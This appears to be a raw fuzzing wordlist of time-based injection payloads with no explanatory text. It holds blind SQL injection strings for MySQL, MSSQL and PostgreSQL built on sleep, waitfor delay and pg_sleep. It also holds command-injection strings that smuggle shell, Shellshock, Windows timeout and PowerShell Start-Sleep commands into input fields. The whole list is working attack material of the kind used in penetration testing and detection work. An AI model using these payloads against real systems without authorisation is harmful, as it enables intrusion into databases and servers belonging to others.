sleep(6)#
1 or sleep(6)#
" or sleep(6)#
' or sleep(6)#
" or sleep(6)="
' or sleep(6)='
1) or sleep(6)#
") or sleep(6)="
') or sleep(6)='
1)) or sleep(6)#
")) or sleep(6)="
')) or sleep(6)='
;waitfor delay '0:0:6'--
);waitfor delay '0:0:6'--
';waitfor delay '0:0:6'--
";waitfor delay '0:0:6'--
');waitfor delay '0:0:6'--
");waitfor delay '0:0:6'--
));waitfor delay '0:0:6'--
'));waitfor delay '0:0:6'--
"));waitfor delay '0:0:6'--
pg_sleep(6)--
1 or pg_sleep(6)--
" or pg_sleep(6)--
' or pg_sleep(6)--
1) or pg_sleep(6)--
") or pg_sleep(6)--
') or pg_sleep(6)--
1)) or pg_sleep(6)--
")) or pg_sleep(6)--
')) or pg_sleep(6)--
AND (SELECT * FROM (SELECT(SLEEP(6)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(6)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)--
AND (SELECT * FROM (SELECT(SLEEP(6)))nQIP)#
SLEEP(6)#
SLEEP(6)--
SLEEP(6)="
SLEEP(6)='
SLEEP(6)/*' or SLEEP(6) or '" or SLEEP(6) or "*/
sleep(4)#
;sleep 4;
|sleep 4#
|/usr/bin/sleep 4#
|sleep 4;
& sleep 4;
;sleep 4|
`sleep 4`
`/usr/bin/sleep 4`
`sleep 4`
() { :;}; /bin/bash -c "sleep 4"
|C:\Windows\System32\timeout.exe 4
|timeout 4|
|C:\Windows\System32\timeout.exe 4|
|timeout 4;
;system('timeout 4')
;system('C:\Windows\System32\timeout.exe 4')
&& FOR /F "delims=" %i IN ('timeout 4') DO echo 1
;Start-Sleep -s 4;
;Start-Sleep -s 4#
|Start-Sleep -s 4|
|Start-Sleep -s 4;
;Start-Sleep -s 4|
;system('Start-Sleep -s 4')
%0AStart-Sleep -s 4%0A
%0a Start-Sleep -s 4 %0a
